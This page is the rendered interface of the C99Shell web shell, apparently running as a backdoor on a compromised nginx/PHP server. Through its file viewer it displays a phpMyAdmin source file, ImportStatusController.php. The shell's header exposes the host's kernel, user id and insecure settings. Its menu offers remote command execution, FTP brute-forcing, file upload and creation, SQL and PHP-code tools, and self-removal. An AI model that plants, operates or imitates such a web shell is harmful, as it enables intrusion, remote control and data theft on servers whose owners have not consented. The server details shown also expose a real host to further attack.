!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/phpmyadmin/libraries/classes/Controllers/   drwxr-xr-x
Free 83.31 GB of 96.73 GB (86.13%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ImportStatusController.php (2.26 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
PhpMyAdmin\Controllers;

use 
PhpMyAdmin\Core;
use 
PhpMyAdmin\Import\Ajax;
use 
PhpMyAdmin\Message;
use 
PhpMyAdmin\Template;
use function 
header;
use function 
ini_get;
use function 
session_start;
use function 
session_write_close;
use function 
time;
use function 
usleep;

/**
 * Import progress bar backend
 */
class ImportStatusController
{
    
/** @var Template */
    
private $template;

    
/**
     * @param Template $template Template object
     */
    
public function __construct(Template $template)
    {
        
$this->template $template;
    }

    public function 
index(): void
    
{
        global 
$SESSION_KEY$upload_id$plugins$timestamp;

        [
            
$SESSION_KEY,
            
$upload_id,
            
$plugins,
        ] = 
Ajax::uploadProgressSetup();

        
// $_GET["message"] is used for asking for an import message
        
if (isset($_GET['message']) && $_GET['message']) {
            
// AJAX requests can't be cached!
            
Core::noCacheHeader();

            
header('Content-type: text/html');

            
// wait 0.3 sec before we check for $_SESSION variable
            
usleep(300000);

            
$maximumTime ini_get('max_execution_time');
            
$timestamp time();
            
// wait until message is available
            
while (($_SESSION['Import_message']['message'] ?? null) == null) {
                
// close session before sleeping
                
session_write_close();
                
// sleep
                
usleep(250000); // 0.25 sec
                // reopen session
                
session_start();

                if (
time() - $timestamp $maximumTime) {
                    
$_SESSION['Import_message']['message'] = Message::error(
                        
__('Could not load the progress of the import.')
                    )->
getDisplay();
                    break;
                }
            }

            echo 
$_SESSION['Import_message']['message'] ?? '';

            if (isset(
$_SESSION['Import_message']['go_back_url'])) {
                echo 
$this->template->render('import_status', [
                    
'go_back_url' => $_SESSION['Import_message']['go_back_url'],
                ]);
            }
        } else {
            
Ajax::status($_GET['id']);
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0043 ]--